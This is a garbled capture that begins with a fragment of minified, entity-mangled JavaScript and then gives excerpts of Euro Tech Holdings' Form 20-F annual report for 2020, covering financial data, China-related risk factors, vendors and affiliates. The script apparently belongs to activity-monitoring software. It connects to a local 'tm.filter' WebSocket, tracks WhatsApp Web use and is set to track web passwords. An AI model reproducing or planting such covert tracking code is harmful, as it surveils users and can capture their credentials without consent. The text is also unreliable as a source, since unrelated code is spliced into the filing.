YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&amp;amp;amp;&amp;amp;amp;(this.extJs.webSockReady=()=&amp;amp;gt;I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&amp;amp;gt;I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&amp;amp;lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&amp;amp;amp;&amp;amp;amp;document[Y]}function p(){var Y=document.head.querySelector("[name='og:title']");return!!Y&amp;amp;amp;&amp;amp;amp;"WhatsApp Web"===Y.getAttribute("content")}function h(){I.send(JSON.stringify({type:"waptracking"}))}function m(){E=new Map,w=new Set,L=0,(k=new Date).setSeconds(0),k.setMilliseconds(0)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&amp;amp;lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&amp;amp;lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,i=Y.length;a&amp;amp;lt;i;a++)t=Y[a],!e.indexOf(t)&amp;amp;amp;&amp;amp;amp;t.length&amp;amp;gt;r&amp;amp;amp;&amp;amp;amp;(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2&amp;amp;gt;d){var g=o.parser[i].call(o,f,n);c[a]=g.index,"M"===a&amp;amp;amp;&amp;amp;amp;c[a]++,l=g.length}else if(7&amp;amp;gt;d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&amp;amp;amp;&amp;amp;amp;a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&amp;amp;amp;&amp;amp;amp;g?(c.Y+=70&amp;amp;gt;c.Y?2e3:100&amp;amp;gt;c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&amp;amp;gt;c.M||12&amp;amp;lt;c.M||1&amp;amp;gt;c.D||c.D&amp;amp;gt;Y[c.M-1]||23&amp;amp;lt;c.H||59&amp;amp;lt;c.m||59&amp;amp;lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&amp;amp;amp;&amp;amp;amp;Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var S={token:"ea347538-9d50-4de4-8902-75b3aa29145b",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"15604",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},v=6e4,y=null,N=null,b=null,A=null,T=!1,E=null,w=null,L=0,k=null,I=null,C="",H=!1;!function Y(e){g()?setTimeout((function(){Y(e)}),1e3):e()}((function(){S.extJs&amp;amp;amp;&amp;amp;amp;S.extJs.init(S.token),n()&amp;amp;amp;&amp;amp;amp;window.addEventListener("focus",r),(n()||S.extJs)&amp;amp;amp;&amp;amp;amp;l()}))}();&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD; &#xD;

FORM 20-F

ANNUAL REPORT PURSUANT TO SECTION 13 OR 15(d) OF THE SECURITIES EXCHANGE ACT OF 1934

For the fiscal year ended December 31, 2020

Commission file number 000-22113

EURO TECH HOLDINGS COMPANY LIMITED
(Exact name of Registrant as specified in its charter)

(Translation of Registrant’s name into English)

British Virgin Islands
(Jurisdiction of incorporation or organization)

Unit D, 18/F., Gee Chang Hong Centre, 65 Wong Chuk Hang Road, Hong Kong
(Address of principal executive offices)

T.C. Leung FAX: 852-28734887 Unit D, 18/F., Gee Chang Hong Centre 65 Wong Chuk Hang Road Hong Kong
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

These forward-looking statements include, but are not limited to, statements about:

●
our goals and growth strategies;

●
our expectations regarding demand for and market acceptance of the products we distribute;

●
our future business development, results of operations and financial condition;

●
government policies and regulations relating to our corporate structure, business and industry;

●
our ability to comply with the continued listing standards on the exchange or trading market on which our ordinary shares is listed for trading;

●
the development of COVID-19 in China and elsewhere;

●
general economic and business condition in China and elsewhere; and

●
assumptions underlying or related to any of the foregoing.

We would like to caution you not to place undue reliance on forward-looking statements and you should read these statements in conjunction with the cautionary statements included in the sections entitled Part I, Item 3D. “Risk Factors” and Item 5. “Operating and Financial Review and Prospects” and the notes to the Company’s Consolidated Financial Statements, describe factors, among others, that could contribute to or cause such differences. Those risks are not exhaustive. We operate in an evolving environment. New risk factors and uncertainties emerge from time to time and it is not possible for our management to predict all risk factors and uncertainties, nor can we assess the impact of all factors on our business or the extent to which any factor, or combination of factors, may cause actual results to differ materially from those contained in any forward-looking statements. We qualify all of our forward-looking statements by these cautionary statements.

You should not rely upon forward-looking statements as predictions of future events. We undertake no obligation to update or revise any forward-looking statements, whether as a result of new information, future events or otherwise, after the date on which the statements are made or to reflect the occurrence of unanticipated events.

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

ITEM 3. KEY INFORMATION

A. SELECTED FINANCIAL DATA

SELECTED FINANCIAL INFORMATION

(Amounts expressed in thousands, except share and per share data and unless otherwise stated)

The selected consolidated statement of operations and comprehensive income / (loss) data for years ended December 31, 2020, 2019 and 2018 and the selected consolidated balance sheet data as of December 31, 2020 and 2019 set forth below are derived from audited consolidated financial statements of the Company included herein and should be read in conjunction with, and are qualified in their entirety by reference to such financial statements, including the notes thereto and “Item 5. Operating and Financial Review and Prospects.” The selected consolidated statement of operations and comprehensive income / (loss) data for the years ended December 31, 2017 and 2016 and the selected consolidated balance sheet data as of December 31, 2018, 2017 and 2016 set forth below are derived from audited consolidated financial statements of the Company which are not included herein.

	2020	2019	2018	2017	2016
	US$	US$	US$	US$	US$
Balance Sheet Data:
Cash and cash equivalents	3,519	5,991	5,267	3,380	3,751
Working capital(1)	4,915	5,350	6,013	2,986	3,101
Total assets	20,095	22,213	23,065	23,737	23,104
Short-term debt(2)	361	565	0	97	720
Net assets	14,463	15,337	15,545	17,107	16,618
Capital stock	123	123	123	123	123

(1) Current assets minus current liabilities.
(2) Short-term debt includes short-term borrowings and current portion of long-term bank loans.

	2020	2019	2018	2017	2016
	US$	US$	US$	US$	US$
Statement of Operations and Comprehensive Income / (Loss) Data:
Revenues	13,357	17,399	20,104	17,350	22,478
Cost of revenues	(9,672)	(12,982)	(16,405)	(12,937)	(17,527)
Gross profit	3,685	4,417	3,699	4,413	4,951
Finance costs	(12)	(4)	(7)	(11)	(19)
Selling and administrative expenses	(5,374)	(4,853)	(4,751)	(4,976)	(5,602)
Operating loss	(1,701)	(440)	(1,059)	(574)	(670)
Interest income	28	83	35	24	18
Other income / (losses), net	307	52	58	(14)	5
Gain / (loss) on disposal of property, plant and equipment	1,429	(5)	3	-	7
Net gain on deemed disposal of affiliate	-	-	-	128	24
Equity in income / (loss) of affiliates	435	137	(932)	831	1,002
Net gain on disposal of affiliate	-	-	1,522	-	-
Net income / (loss) before income taxes	498	(173)	(373)	395	386

Income taxes (expense) / credit	(96)	(37)	312	(28)	(228)

Net income / (loss)	402	(210)	(61)	367	158

Net loss attributable to non-controlling interests	367	64	149	106	73
Net income / (loss) attributable to Euro Tech Holdings Company Limited’s shareholders	769	(146)	88	473	231

Other comprehensive income / (loss)
Net income / (loss)	402	(210)	(61)	367	158
Foreign exchange translation adjustments	(31)	(8)	(58)	122	4

Comprehensive income / (loss)	371	(218)	(119)	489	162
Comprehensive loss attributable to non-controlling interests	350	78	182	45	127

Comprehensive income /(loss) attributable to the Company	721	(140)	63	534	289

Net income / (loss) per ordinary share attributable to Euro Tech Holdings Company Limited’s shareholders
-Basic	0.25	(0.06)	0.04	0.23	0.11
-Diluted	0.25	(0.06)	0.04	0.23	0.11

Weighted average ordinary shares outstanding
-Basic	3,092,859	2,301,993	2,061,909	2,061,909	2,061,909
-Diluted	3,092,859	2,301,993	2,061,909	2,061,909	2,061,909

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

Since 1994, the conversion of Renminbi into foreign currencies, including U.S. dollars, has been based on rates set by the People’s Bank of China, which are set daily based on the previous day’s interbank foreign exchange market rates. From 1994 through 2004, the official exchange rate for the conversion of Renminbi to U.S. dollars was generally stable and maintained at the rate of approximately RMB 8.30 = US$1.00. However, from 2016 through 2020, the Renminbi has fluctuated and at the end of 2020, 2019, 2018, 2017 and 2016, the exchange rates were approximately RMB 6.5249 = US$1.00, RMB 6.9761 = US$1.00, RMB 6.8785 = US$1.00, RMB 6.5040 = US$1.00 and RMB 6.9445 = US$1.00, respectively. The value of the Renminbi fluctuates and is subject to changes in the People’s Republic of China’s (“PRC”) political and economic conditions.

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

The PRC economy appears to be moving from a planned economy to a more market-oriented economy. Although the PRC government has implemented measures since the late 1970s emphasizing the utilization of market forces for economic reform, the reduction of state ownership of productive assets and the establishment of improved corporate governance in business enterprises, a substantial portion of productive assets in the PRC are still owned by the PRC government. In addition, the PRC government continues to play a significant role in regulating industry development by imposing industrial policies. The PRC government also exercises significant control over the PRC’s economic growth through the allocation of resources, controlling payment of foreign currency-denominated obligations, setting monetary policy and providing preferential treatment to particular industries or companies. Recently, the Chinese economy experienced a steep slowdown in growth from a 9.5% GDP in 2011 to 2.3% GDP in 2020 as the Chinese government focuses on raising the incomes of the average citizen and seek a national economy less driven by investment and more by domestic consumer demand. Although past predictions have not always proven reliable, if these predictions prove accurate, they, as well as future actions and policies of the PRC government, could suffer a material adverse effect.

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

Economic Reforms May Not Continue or Impact Positively On the Company; Changing Business Environment.

Over the past several years, the PRC’s government has pursued economic reform policies including encouraging private economic activities and decentralization of economic deregulation. It appears that the PRC government may not continue to pursue these policies or may significantly alter them to our detriment from time to time without notice. Changes in policies by the PRC government resulting in changes in laws, regulations, or their interpretation, or the imposition of confiscatory taxes, restrictions on currency conversion and imports could materially and adversely affect our business and operating results. From 2018 through 2020, the annual growth rates in imports and exports were -2.8% and 7.9%, 9.9% and 0.5%, and -1.1% and 3.6% respectively. The nationalization or other expropriations of private enterprises by the PRC government could result in a loss of our investments in actual funds and time and effort, in China.

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

Our Revenue and Net Income may be Materially and Adversely Affected by any Economic Slowdown in China.

The PRC government has in recent years implemented a number of measures to control the rate of economic growth, including by raising interest rates and adjusting deposit reserve ratios for commercial banks as well as by implementing other measures designed to tighten credit and liquidity. These measures have contributed to a slowdown of the PRC economy. According to the National Bureau of Statistics of China, China’s GDP growth rate was 2.3% in 2020. Any continuing or worsening slowdown could significantly reduce domestic commerce in China. An economic downturn, whether actual or perceived, a further decrease in economic growth rates or an otherwise uncertain economic outlook in China or any other market in which we may operate could have a material adverse effect on our business, financial condition and results of operations.

We May be Impacted by Inflation in PRC.

In recent years, the PRC has not experienced significant inflation, and thus inflation has not had a significant effect on our business historically. In response to the increased inflation rate during 2004, the Chinese government announced measures to restrict lending and investment in the PRC in order to reduce inflationary pressure on the PRC’s economy; more recently, the average inflation rate has increased by 2.0%, 1.6%, 2.1%, 2.9% and 2.5% in 2016, 2017, 2018, 2019 and 2020, respectively. Efforts by the PRC to curb inflation may also curb economic growth, increase our overhead costs and adversely affect our revenues. Inflationary increases cause a corresponding increase in our general overhead. If the PRC rate of inflation continues to increases, the Chinese government may introduce further measures intended to reduce the inflation rate in the PRC. Any such measures adopted by the Chinese government may not be successful in reducing or slowing the increase in the PRC’s inflation rate. A sustained or increased inflation in the PRC may have an adverse impact on the PRC’s economy and may materially and adversely affect our business and financial results.

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

The value of the Renminbi against the U.S. dollar and other currencies is affected by changes in China’s political and economic conditions and by China’s foreign exchange policies, among other things. In July 2005, the PRC government changed its decades-old policy of pegging the value of the Renminbi to the U.S. dollar, and the Renminbi appreciated more than 20% against the U.S. dollar over the following three years. Between July 2008 and June 2010, this appreciation halted and the exchange rate between the Renminbi and the U.S. dollar remained within a narrow band. Since June 2010, the Renminbi has fluctuated against the U.S. dollar, at times significantly and unpredictably, and in recent years the Renminbi has depreciated significantly against the U.S. dollar. Since October 1, 2016, the Renminbi has joined the International Monetary Fund (IMF)’s basket of currencies that make up the Special Drawing Right (SDR), along with the U.S. dollar, the Euro, the Japanese yen and the British pound. In the fourth quarter of 2016, the Renminbi has depreciated significantly in the backdrop of a surging U.S. dollar and persistent capital outflows of China. This depreciation halted in 2017, and the Renminbi appreciated approximately 6.3%, 1.1% and 1.7% against the U.S. dollar during 2017, 2018, 2019 respectively. In 2020, the Renminbi appreciated approximately 0.02% against the U.S. dollar. With the development of the foreign exchange market and progress towards interest rate liberalization and Renminbi internationalization, the PRC government may in the future announce further changes to the exchange rate system and there is no guarantee that the RMB will not appreciate or depreciate significantly in value against the U.S. dollar in the future. It is difficult to predict how market forces or PRC or U.S. government policy may impact the exchange rate between the RMB and the U.S. dollar in the future.

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

The PRC has had Turbulent Relations with the United States of America (the “United States” or the “U.S.”).

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

During Fiscal 2020, the Company had revenues of approximately US$13,357,000, operating losses of approximately US$1,701,000, and income before income taxes, equity in income of affiliates and non-controlling interests of approximately US$63,000. In addition, we had income tax expense of US$96,000, equity in income of affiliates of US$435,000. As a result, we had a net income of US$402,000 for Fiscal 2020 before giving effect to the effect on our results attributable to our non-controlling interests. The principal reason for the operating loss before income taxes, equity in income of affiliates and non-controlling interests for Fiscal 2020 was the decrease in revenues even though there was increase in the gross profit margin percentage. After giving effect to the net loss attributable to non-controlling interest, other comprehensive income / (loss) and comprehensive loss attributable to non-controlling interest, we had comprehensive income attributable to the Company of US$721,000 for Fiscal 2020.

During Fiscal 2019, the Company had revenues of approximately US$17,399,000, operating losses of approximately US$440,000, and losses before income taxes, equity in income of affiliates and non-controlling interests of approximately US$310,000. In addition, we had income tax expense of US$37,000, equity in income of affiliates of US$137,000. As a result, we had a net loss of US$210,000 for Fiscal 2019 before giving effect to the effect on our results attributable to our non-controlling interests. The principal reason for the operating losses before income taxes, equity in loss of affiliates and non-controlling interests for Fiscal 2019 was the decrease in revenues even though there was increase in the gross profit margin percentage. After giving effect to the net loss attributable to non-controlling interest, other comprehensive income / (loss) and comprehensive loss attributable to non-controlling interest, we had comprehensive loss attributable to the Company of $140,000 for Fiscal 2019.

During Fiscal 2018, the Company had revenues of approximately US$20,104,000, operating losses of approximately US$1,059,000, and income before income taxes, equity in loss of affiliates and non-controlling interests of approximately US$559,000. In addition, we had income tax credits of US$312,000, equity in loss of affiliates of (US$932,000), and a gain on the disposal of affiliate of US$1,522,000. As a result, we had a net loss of US$61,000 for Fiscal 2018 before giving effect to the effect on our results attributable to our non-controlling interests. The principal reason for the operating losses before income taxes, equity in loss of affiliates and non-controlling interests for Fiscal 2018 was the decrease in the gross profit margin percentage of contracts under the keen competitive market condition. After giving effect to the net loss attributable to non-controlling interest, other comprehensive income / (loss) and comprehensive loss attributable to non-controlling interest, we had comprehensive income attributable to the Company of $63,000 for Fiscal 2018.

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

The outbreak of the coronavirus could have a material impact on our business in 2021. The pandemic may have the effect of causing delay and disruption in engineering contracts and completion of projects. Further, the travel restrictions have had disrupted our ability to make business visits which, in turn, our ability to make potential new sales. In general, the combination of supply-side disruption, delivery challenges and potential, long-term waning consumer demand caused by COVID-19, potentially exacerbated by other factors, have negatively impacted and could continue to negatively impact our business. While we continue to monitor the situation, at this point it is difficult to assess the probable significance or duration of any disruption. As a result, we are taking a number of defensive measures to cut costs and conserve our cash resources, including reduction in number of employees until we have more confidence concerning the current situation.

The situation surrounding COVID-19 remains fluid, and given its inherent uncertainty, it may have an adverse impact on our business in the near term. Should these conditions persist for a prolonged period, the COVID-19 pandemic, including any of the above factors and others that are currently unknown, may have a material adverse effect on our business, financial condition, results of operations and cash flows. In addition, we cannot predict the impact that COVID-19 will have on our customers and suppliers, and any adverse impacts on these parties may have a material adverse impact on our business.

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

During 2015, the Company entered into a contract to supply a 300 Cubic Meters per hour BWTS for a maritime institute in Jiangsu, and such goods were delivered in 2016. It also received an order for one set of P-300 BWTS for a scientific research ship from Russia in 2017 and completed in 2018. In addition, in 2018, it received a PRC government grant for ballast water port solution. The development of the ballast water port solution prototype is now completed and under system and operation tests in various ports. The port solution system is a system installed in port to offer ballast water treatment services for ocean going ships without their own ballast water treatment system (“BWTS”) and for those with damaged BWTS. The Company is now embarking on promotion activities for port solution systems in China and South East Asia and received its first order in 2020. The Company hopes to receive revenues from both port (barge) and commercial vessels for ballast water treatment including retrofit orders and new built orders. However, the intake of orders may be affected by, among other things, the success of the Company’s marketing and sales efforts, and by the acceptance of the Company’s products by customers. There can be no assurance that the Company’s continued streamlining efforts, or that sales of its ballast water treatment process, will be successful or, if successful, that these efforts will result in a reduction in losses, an increase in revenues and/or the achievement of profitability by the Company.

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

Dependence on Vendors; Lack of Long Term Arrangements; Loss of Vendors.

The Company distributes supplies manufactured by a number of vendors. Thermo Fisher Scientific Group (“Thermo”), Metertest SP.ZO.O. (“Metertest”), Stanford Research Systems, Inc. (“Stanford”), Hach Company (“Hach”), Hioki E.E. Corp. (“Hioki”) and Biotage Sweden AB (“Biotage”) are among the Company’s largest suppliers, pursuant to short term arrangements. Although alternative sources of supply exist, there can be no assurance that the termination of the Company’s relationship with any of the above or other vendors would not have an adverse effect on the Company’s operations due to the Company’s dependence on these vendors. A substantial number of the Company’s suppliers have been selling their products into China directly and through other distributors. During Fiscal 2018, our sales revenue from trading activities increased by approximately 25%. During Fiscal 2019, our sales revenue from trading activities decreased by approximately 14%. During Fiscal 2020, our sales revenue from trading activities decreased by approximately 20%. A loss of a substantial vendor or substantial number of our other vendors and/or our competing with them would have a material adverse effect on our revenues from trading activities.

The loss of any of our key customers could reduce our revenues and our profitability.

For the year ended December 31, 2020, sales to our three largest customers amounted in the aggregate to approximately 23% of our total revenue. For the year ended December 31, 2019, sales to our three largest customers amounted in the aggregate to approximately 34% of our total revenue. For the year ended December 31, 2018, sales to our two largest customers amounted in the aggregate to approximately 22% of our total revenue. There can be no assurance that we will maintain or improve the relationships with these customers, or that we will be able to continue to supply these customers at current levels or at all. Any failure to pay by these customers could have a material negative effect on our company’s business. In addition, having a relatively small number of customers may cause our half yearly or annual results to be inconsistent, depending upon when these customers pay for outstanding invoices.

During the years ended December 31, 2020, 2019 and 2018, respectively, we had one or more customers that accounted for 10% or more of our revenues.

Customer Name	Year Ended December 31,2020	Year Ended December 31,2019	Year Ended December 31,2018
Customer A	-%	19%	15%
Customer B	-%	10%	—%

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

The trading price for our Ordinary Shares has fluctuated since we first listed our Ordinary Shares. Over the past two years, the trading price of our Ordinary Shares has ranged from US$1.17 to US$4.32 per common share, and the last reported trading price on April 1, 2021 was US$3.54 per Ordinary Share. The market price of our Ordinary Shares may fluctuate significantly in response to numerous factors, many of which are beyond our control, including:

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

We May Be Considered To Be A Passive Foreign Investment Company For The 2020 Calendar Year And May Be A Passive Foreign Investment Company For Future Years, Which Would Result In Adverse U.S. Federal Income Tax Consequences To U.S. Holders Of Our Ordinary Shares.

A non-U.S. corporation will be considered a passive foreign investment company (“PFIC”) for U.S. income tax purposes, for any taxable year if either (i) at least 75% of its gross income is passive income or (ii) at least 50% of the value of its assets (based on an average of the quarterly values of the assets during a taxable year) is attributable to assets that produce or are held for the production of passive income. The annual PFIC determination to be made by a U.S. holder of our ordinary shares is an inherently factual determination and there is limited guidance regarding the application of the PFIC rules to specific situations. We currently hold a substantial amount of cash and cash equivalents, and investments in PRC enterprises, and the value of our goodwill and other assets may be based in part on the market price of our ordinary shares, which has experienced significant fluctuations. Although the determination of PFIC status is subject to factual uncertainties because it depends upon the valuation of our ordinary shares, as well as our goodwill and other assets and income, we are uncertain if we would be considered to be a PFIC for 2020. In addition, as the determination of PFIC status is made on an annual basis and depends on variables over which we have limited control, there can be no assurance that we will not be a PFIC for 2021 or any future years. If we are a PFIC in any year, U.S. holders will be subject to certain adverse United States federal income tax consequences, and are urged to consult with his or her tax advisor. See— Item 10. “Taxation—United States Federal Income Taxation .”

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

We established Shanghai Euro Tech Environmental Engineering Company Ltd. (“Shanghai Environmental”) as a wholly-owned subsidiary under the laws of the PRC, to carry on our environmental engineering department with that line of business and its personnel transferred from our subsidiary, Far East. Shanghai Environmental is focusing on our water and waste-water treatment engineering business. We are scaling down this company to avoid duplication of costs and efforts as we have a 58% equity interest in Pact-Yixing which operate similar business activities. Shanghai Environmental is just completing its outstanding projects and had made an operating (loss) / income of approximately (US$34,000) in Fiscal 2018, US$36,000 in Fiscal 2019 and (US$110,000) in Fiscal 2020, and we plan to wind it down.

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

Far East owns a 19.4% equity interest in Zhejiang Tianlan Environmental Protection Technology Co. Ltd. (“Blue Sky”), founded in 2000. Blue Sky provides design and general contracting services, equipment manufacturing, installation, testing and operation management for the purification treatment of industrial waste gases (specifically as desulphurization, flue gas de-nitration, dust removal) emitted from various boilers and industrial furnaces of power plants, steelworks and chemical plants. By securing an equity stake in Blue Sky’s business, we have a strategic partner to work within China’s environmental protection business. With Blue Sky’s technology and technical support, we believe we are able to provide services and environmental solutions not only for water and waste-water treatment but also for air pollution control for industrial clients in China. Blue Sky's revenue decreased during Fiscal 2018, decreased during Fiscal 2019 and increased during Fiscal 2020, and its net income decreased significantly during Fiscal 2018 particularly due to the filing for bankruptcy liquidation of one of its major customers, increased during Fiscal 2019 and increased during Fiscal 2020. Blue Sky listed its shares on the New Third Board since November 17, 2015 and it suspended trading from August 15, 2017 and resumed trading on February 2, 2018 and suspended trading from November 24, 2020 and resumed trading on January 6, 2021. The New Third Board in the PRC, a national over-the-counter market in the PRC regulated by the China Securities Regulatory Commission, serves as a trading platform for small and medium-sized enterprises. Any new issuance of Blue Sky's shares on the New Third Board will dilute our ownership in Blue Sky. On the other hand, the New Third Board provides us with an exit channel to sell our position in Blue Sky if the price is attractive.

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

In Fiscal 2020, Blue Sky made an income contribution of approximately US$435,000 to the Company. The income contribution from Blue Sky in Fiscal 2020 was principally because there was recovery of the accounts receivables for which impairment loss provision was made in previous years. In Fiscal 2019, Blue Sky made an income contribution of approximately US$137,000 to the Company. The income contribution from Blue Sky in Fiscal 2019 was principally because there was no major impairment loss for the accounts receivables from its major customers. In Fiscal 2018, Blue Sky made a loss contribution of approximately US$786,000, and Jia Huan made a loss contribution of approximately US$146,000 (up to the date of disposal) to the Company. The loss contribution from Blue Sky in Fiscal 2018 was principally caused by a decrease in sales revenue as a result of the filing for bankruptcy liquidation of one of Blue Sky’s major customers, while the loss contribution from Jia Huan is only reflective of the loss contribution of Jia Huan up to the date of its disposal in May 2018. China’s 13th Five Year Plan promotes a cleaner and greener economy, with strong commitments to environmental management and protection, clean energy and emissions controls, ecological protection and security, and the development of green industries. This demonstrates a clear focus on charting a sustainable course for the economy in the long-term and the desire to play a global role in curbing greenhouse gas emissions. Thus, management believes the development in the Chinese government policy may benefit our business as well as the business of its affiliate, Blue Sky.

The SEC maintains an Internet site that contains reports, proxy and other information regarding issuers that file electronically with the SEC (such as the Company) and the address of that site is http://www.sec.gov.

The Company maintains a website at http://www.euro-tech.com. The Company has an internet platform located at http://www.chinah2o.com. The Company, through its subsidiary, Euro Tech Trading (Shanghai) Limited, a PRC corporation, has an internet platform located at http://www.yibaynet.com.cn.

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

We continue the process of shifting our emphasis from the distribution of instruments and equipment to engineering and manufacturing activities. However, the development of manufacturing activities was not that successful. Revenues from our trading activities have fallen-off as a substantial number of our suppliers have been selling their products into China directly and through other distributors. Many of these other distributors are local Chinese companies and can operate with a lower overhead.

During Fiscal 2018, there was increase in revenues from trading and manufacturing activities. Revenue from Pact-Yixing in 2018 was US$6,354,000, while Shanghai Environmental incurred an operating loss of US$34,000. In addition, we incurred research and development costs of approximately US$160,000 in 2018 relating to BWTS and Pact-Yixing incurred an operating loss of approximately US$787,000. This resulted in operating loss from engineering activities of approximately US$821,000. We continue to scale down Shanghai Environmental to avoid duplication of costs and efforts, as Pact-Yixing operate similar business activities, and we plan to wind it down upon collection of outstanding accounts receivable.

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

